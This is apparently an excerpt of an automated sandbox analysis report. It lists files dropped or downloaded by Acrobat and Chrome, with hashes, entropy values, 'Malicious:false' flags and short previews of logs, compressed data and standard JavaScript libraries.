                                                                              Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.2./.1.0./.2.0.2.4. . .2.1.:.1.3.:.3.3. .=.=.=.....
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:ASCII text, with very long lines (393)
                                                                              Category:dropped
                                                                              Size (bytes):16525
                                                                              Entropy (8bit):5.345946398610936
                                                                              Encrypted:false
                                                                              SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                              MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                              SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                              SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                              SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                              Malicious:false
                                                                              Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):15114
                                                                              Entropy (8bit):5.311761711084562
                                                                              Encrypted:false
                                                                              SSDEEP:384:fZvs3RVVst4/K09CFuWHwC+bvkJZovv4ugb/5RBzx/oxDx7VVepI7I72XOg7nC6N:Y3B
                                                                              MD5:11FFE3EE3CB01C25A4FEC8D1887A7802
                                                                              SHA1:AA68589F9ED21CCD14AC6A0DC8762CF049F6D003
                                                                              SHA-256:DD6117DDF3E85402B1216479BBDC0B4FC9138D50695A3740D6C85912814962D2
                                                                              SHA-512:43B9DA18279E07421173EE455EE497BF78A96482F2FE2CC480E858BC0633A136493B9A83622547A37012F2A0E64E3F583E4F71A5A363921E2C95BA9A209CE408
                                                                              Malicious:false
                                                                              Preview:SessionID=40ad2073-d7a6-443c-814c-f41f66431a6d.1727918007342 Timestamp=2024-10-02T21:13:27:342-0400 ThreadID=7124 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=40ad2073-d7a6-443c-814c-f41f66431a6d.1727918007342 Timestamp=2024-10-02T21:13:27:347-0400 ThreadID=7124 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=40ad2073-d7a6-443c-814c-f41f66431a6d.1727918007342 Timestamp=2024-10-02T21:13:27:347-0400 ThreadID=7124 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=40ad2073-d7a6-443c-814c-f41f66431a6d.1727918007342 Timestamp=2024-10-02T21:13:27:347-0400 ThreadID=7124 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=40ad2073-d7a6-443c-814c-f41f66431a6d.1727918007342 Timestamp=2024-10-02T21:13:27:347-0400 ThreadID=7124 Component=ngl-lib_NglAppLib Description="SetConf
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):29752
                                                                              Entropy (8bit):5.388260866141616
                                                                              Encrypted:false
                                                                              SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rO:i
                                                                              MD5:35571EEC7E0E6E33F88760D2B690623D
                                                                              SHA1:A9C45DCA19AA788CA45FE1139BADD96B36622D5C
                                                                              SHA-256:6D04836DEA312DD5EB1A280F73E5E19862D255231A5F8965D8D3B1008E0E5D26
                                                                              SHA-512:1DE0FAC6C5BDAFEF38337BBF96AC6D124095A6D7381660DA0F964C77394334E1DFB2107BB27B27E10095EA4EFF308A8D2BB4842E36C5E7043B0998838C18D7B7
                                                                              Malicious:false
                                                                              Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                              Category:dropped
                                                                              Size (bytes):1407294
                                                                              Entropy (8bit):7.97605879016224
                                                                              Encrypted:false
                                                                              SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                              MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                              SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                              SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                              SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                              Malicious:false
                                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                              Category:dropped
                                                                              Size (bytes):1419751
                                                                              Entropy (8bit):7.976496077007677
                                                                              Encrypted:false
                                                                              SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                              MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                                              SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                                              SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                                              SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                                              Malicious:false
                                                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                              Category:dropped
                                                                              Size (bytes):386528
                                                                              Entropy (8bit):7.9736851559892425
                                                                              Encrypted:false
                                                                              SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                              MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                              SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                              SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                              SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                              Malicious:false
                                                                              Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                              Category:dropped
                                                                              Size (bytes):758601
                                                                              Entropy (8bit):7.98639316555857
                                                                              Encrypted:false
                                                                              SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                              MD5:3A49135134665364308390AC398006F1
                                                                              SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                              SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                              SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                              Malicious:false
                                                                              Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):48316
                                                                              Entropy (8bit):5.6346993394709
                                                                              Encrypted:false
                                                                              SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                              MD5:2CA03AD87885AB983541092B87ADB299
                                                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                              Malicious:false
                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):61
                                                                              Entropy (8bit):3.990210155325004
                                                                              Encrypted:false
                                                                              SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                              Malicious:false
                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (65447)
                                                                              Category:dropped
                                                                              Size (bytes):89501
                                                                              Entropy (8bit):5.289893677458563
                                                                              Encrypted:false
                                                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                              Malicious:false
                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 74 x 53, 8-bit/color RGB, non-interlaced
                                                                              Category:downloaded
                                                                              Size (bytes):61
                                                                              Entropy (8bit):4.068159130770306
                                                                              Encrypted:false
                                                                              SSDEEP:3:yionv//thPlFq/kHl/xl/k4E08up:6v/lhP/H17Tp
                                                                              MD5:ADB738881820EF158FED71999F3B4B61
                                                                              SHA1:E12EDA92059134D654EB9AFE8C1A6C15492EC75D
                                                                              SHA-256:864609BBBC7D1469ADCB76AE9084C7F50268BBA0A2A660A00FB5843CCCC6CA2D
                                                                              SHA-512:D9B79A8FCF22965816D826E568C31D32DBC9C0E435B0388DBDC39DA03F1BE9AE1FF95759CE434DEAC2DA0D3DE369EB67EF5417B16C35622350BBA9C1A7110E09
                                                                              Malicious:false
                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cc91295984a41f3/1727918039190/9M5zpoXvO6uqP1X
                                                                              Preview:.PNG........IHDR...J...5.....i..2....IDAT.....$.....IEND.B`.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (47261)
                                                                              Category:dropped
                                                                              Size (bytes):47262
                                                                              Entropy (8bit):5.3974731018213795
                                                                              Encrypted:false
                                                                              SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                              MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                              SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                              SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                              SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                              Malicious:false
                                                                              Preview:"use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);function g(p){Vt(l,o,c,g,f,"next",p)}function f(p){Vt(l,o,c,g,f,"throw",p)}g(void 0)})}}function U(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):U(e,r)}function Me(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Fe(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Me(e,c,a[c])})}return e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):48316
                                                                              Entropy (8bit):5.6346993394709
                                                                              Encrypted:false
                                                                              SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                              MD5:2CA03AD87885AB983541092B87ADB299
                                                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                              Malicious:false
                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                              Category:downloaded
                                                                              Size (bytes):61
                                                                              Entropy (8bit):3.990210155325004
                                                                              Encrypted:false
                                                                              SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                              Malicious:false
                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (65447)
                                                                              Category:downloaded
                                                                              Size (bytes):89501
                                                                              Entropy (8bit):5.289893677458563
                                                                              Encrypted:false
                                                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                              MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                              SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                              SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                              SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                              Malicious:false
                                                                              URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 74 x 53, 8-bit/color RGB, non-interlaced
                                                                              Category:dropped
                                                                              Size (bytes):61
                                                                              Entropy (8bit):4.068159130770306
                                                                              Encrypted:false
                                                                              SSDEEP:3:yionv//thPlFq/kHl/xl/k4E08up:6v/lhP/H17Tp
                                                                              MD5:ADB738881820EF158FED71999F3B4B61
                                                                              SHA1:E12EDA92059134D654EB9AFE8C1A6C15492EC75D
                                                                              SHA-256:864609BBBC7D1469ADCB76AE9084C7F50268BBA0A2A660A00FB5843CCCC6CA2D
                                                                              SHA-512:D9B79A8FCF22965816D826E568C31D32DBC9C0E435B0388DBDC39DA03F1BE9AE1FF95759CE434DEAC2DA0D3DE369EB67EF5417B16C35622350BBA9C1A7110E09
                                                                              Malicious:false
                                                                              Preview:.PNG........IHDR...J...5.....i..2....IDAT.....$.....IEND.B`.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 14 x 69, 8-bit/color RGB, non-interlaced
                                                                              Category:downloaded
                                                                              Size (bytes):61
                                                                              Entropy (8bit):4.035372245524405
                                                                              Encrypted:false
